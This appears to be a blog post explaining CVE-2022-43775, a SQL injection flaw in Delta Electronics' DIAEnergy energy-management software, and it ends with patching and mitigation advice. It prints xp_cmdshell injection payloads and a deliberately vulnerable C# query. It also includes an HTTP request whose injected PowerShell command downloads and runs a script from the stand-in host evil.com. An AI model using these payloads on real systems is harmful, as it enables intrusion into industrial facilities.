CVE-2022-43775 - Exploiting SQL Injection in Delta Electronics DIAEnergy (v1.9) — How Attackers Could Take Over Remote Systems

In late 2022, cybersecurity researchers discovered a critical vulnerability, tracked as CVE-2022-43775, in the DIAEnergy v1.9 system developed by Delta Electronics. The issue resides in the HICT_Loop class, which is responsible for handling numerous database operations inside the application. This flaw is a classic case of SQL Injection—but with a potentially devastating twist: it can be abused to execute malicious code remotely.

In this post, we'll break down how this vulnerability works, its exploitability, and what it means for organizations using DIAEnergy. We'll provide code snippets, references to original advisories, and a simple demonstration of how an attack might unfold.

What is DIAEnergy?

DIAEnergy is a comprehensive "Energy Management System" developed by Delta Electronics, used by manufacturing plants, data centers, and other large facilities to monitor and optimize their energy usage. Due to its operational importance, this platform is often connected to critical infrastructure networks.

Under the Hood: The HICT_Loop Class

At the heart of DIAEnergy is the HICT_Loop class. This class takes user input and constructs SQL queries to interact with the backend database, such as fetching energy usage logs or device settings. Unfortunately, DIAEnergy v1.9 does not properly sanitize this user input in some endpoints exposed by HICT_Loop.

The Vulnerability: SQL Injection

SQL Injection occurs when an attacker sends malicious SQL code as input to an application's database query, allowing them to read, modify, or even delete data—and, in some cases, execute commands on the underlying system.

In the case of CVE-2022-43775, an attacker can exploit the bug by supplying crafted input to certain parameters handled by HICT_Loop. For example, an unauthenticated attacker could submit the following payload:

'; EXEC xp_cmdshell('whoami'); --

If the application inserts this input directly into a SQL statement like

string query = "SELECT * FROM DeviceLogs WHERE deviceID = '" + userInput + "'";

...then the attacker's payload closes the existing SQL string and executes arbitrary commands, such as whoami, on the operating system if dangerous Extended Stored Procedures like xp_cmdshell are enabled (common with some legacy MSSQL setups).

Proof-of-Concept Exploit

Here’s a simplified code snippet showing what the vulnerable code might look like in C# (since DIAEnergy is a Windows-based system):

// BAD: Vulnerable to SQL Injection
public DataTable GetDeviceLogs(string deviceID)
{
    string query = $"SELECT * FROM DeviceLogs WHERE deviceID = '{deviceID}'";
    using (var connection = new SqlConnection(conStr))
    using (var command = new SqlCommand(query, connection))
    {
        connection.Open();
        var adapter = new SqlDataAdapter(command);
        var results = new DataTable();
        adapter.Fill(results);
        return results;
    }
}

If you supply a malicious value in deviceID, such as

'; EXEC xp_cmdshell('calc.exe'); --

This can result in the Windows Calculator popping up on the server. An attacker could easily swap that call out for downloading malware, creating a reverse shell, or stealing data.

Real-World Attack Scenario

1. Attacker discovers the DIAEnergy v1.9 web interface/listens for network traffic.

`

POST /HICT_Loop/GetDeviceLogs HTTP/1.1

Host: target.example.com

deviceID='; EXEC xp_cmdshell('powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"'); --

`

4. DIASystem executes the payload, running code fetched from the attacker's server. The attacker gains full control of the device.

References and More Information

- Delta Electronics DIAEnergy Product Page
- CVE-2022-43775 at NVD
- ICS-CERT Advisory

How to Mitigate

- Update DIAEnergy: Delta Electronics has published security updates for this and other issues. Always update to the latest version.
- Sanitize Inputs: All user input must be strictly validated, parameterized, and sanitized before forming any SQL queries.
- Restrict Database Privileges: Never grant excessive permissions like xp_cmdshell unless absolutely necessary.
- Monitor for Abuse: Enable intrusion detection systems and monitor for unusual SQL or OS command activity.

Final Thoughts

CVE-2022-43775 is a critical reminder about the importance of never trusting user input and following security best practices when building enterprise software. If you run DIAEnergy in your organization, patch immediately and audit all database-facing code. SQL Injection remains one of the most widely exploited vulnerabilities—don't let your systems be next.


*This post is an original summary and technical breakdown based on public disclosures and our analysis. For the latest updates and mitigations, check the links above.*

Timeline

Published on: 10/26/2022 18:15:00 UTC
Last modified on: 10/28/2022 01:54:00 UTC